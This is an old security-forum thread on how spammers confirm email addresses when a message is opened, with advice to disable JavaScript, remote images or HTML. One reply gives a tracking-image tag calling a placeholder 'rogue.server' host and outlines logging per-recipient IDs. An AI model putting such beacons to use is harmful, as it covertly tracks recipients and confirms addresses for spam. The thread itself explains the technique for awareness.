View Poll Results: Will the US attack Iran
- Voters
- 9. You may not vote on this poll
-
November 7th, 2005, 05:07 AM
#1
Junior Member
How spammers can confirm your email address without you even responding.
I have found a way for a spammer to confirm an email address is valid without the user even responding to it. Here is how it is done. An email with an html form with hidden values is sent to the unfortunate reciepient. A JavaScript is inserted to acquire information such as the screen dimmensions, browser and operating version. The email software the puts the email and all the Javascript information plus the email address into hidden fields. This JavaScript is loaded when the email is opened and the JavaScript function sends the html form back to the spammer. Then on the spammer side, he uses Perl to get statistics such as IP Adress and UserID. VIOLA! THE SPAMMER AS A CONFIRMED EMAIL ADDRESS AND IMPORTANT DEMOGRAPHIC INFORMATION JUST RIPE FOR EXPOILTATION.
The Moral of the Story::::
DON'T HAVE JAVASCRIPT ENABLED ON YOUR EMAIL!!!!
-
November 7th, 2005, 10:48 AM
#2
I have found a way for a spammer to confirm an email address is valid without the user even responding to it.
It's been used and abused before.. You're not the first one to think of this.
Why use javascript? It's, by default, turned off in todays mailclients..
Something like a remote image will do the trick quite nicely too..
Code:
<img src=http://rogue.server/pic.php?id=123456787>
Generate a new ID for every email send.. Use a database or something to log ID->email address relation.. Create pic.php to log the ID (and everything else you want) and make it return a GIF/JPG..
Unless ofcourse remote images are turned off in the mailclient the user only has to open/read the email.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
November 7th, 2005, 11:15 AM
#3
Wouldn't the better moral be 'Don't open email from people you don't know'?
-
November 7th, 2005, 11:20 AM
#4
Originally posted here by therenegade
Wouldn't the better moral be 'Don't open email from people you don't know'?
Good point.. But... A lot of virusses/worms come from friends and family.. Sometimes spam too (faked email from: address)..
Oliver's Law:
Experience is something you don't get until just after you need it.
-
November 7th, 2005, 11:40 AM
#5
Originally posted here by SirDice
But... A lot of virusses/worms come from friends and family.. Sometimes spam too (faked email from: address)..
Which is when we fall back on to the "Don't open attachments you're not really sure of' rule..admittedly,this fails in lieu of the average home user...as does enforcing a strict security policy(I don't think I've seen too many who surf from non-admin accounts...actually,I think a lot of them don't even know that there're other types of accounts...or that they're on an admin account)..unfortunately it's what's happening in a lot of homes all over today..which is why we go back to 'Get an AV and keep it updated.'
-
November 7th, 2005, 06:08 PM
#6
The average home user is also the reason why remote images and javascript are turned off by default
Oliver's Law:
Experience is something you don't get until just after you need it.
-
November 7th, 2005, 06:16 PM
#7
The best way to view all e-mails , in my experience, is in a text only mode. All of the mail clients I use convert html messages to text only mesages. and then they give you the option to view the html version if you want.
"Do you know why the system is slow?" they ask
"It's probably something to do with..." I look up today's excuse ".. clock speed"
-BOFH
-
November 7th, 2005, 06:34 PM
#8
True SirDice...but the average user ever so often has the tendency to try and enable it for percieved 'added functionality'(read as chat,pr0n whatever )
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|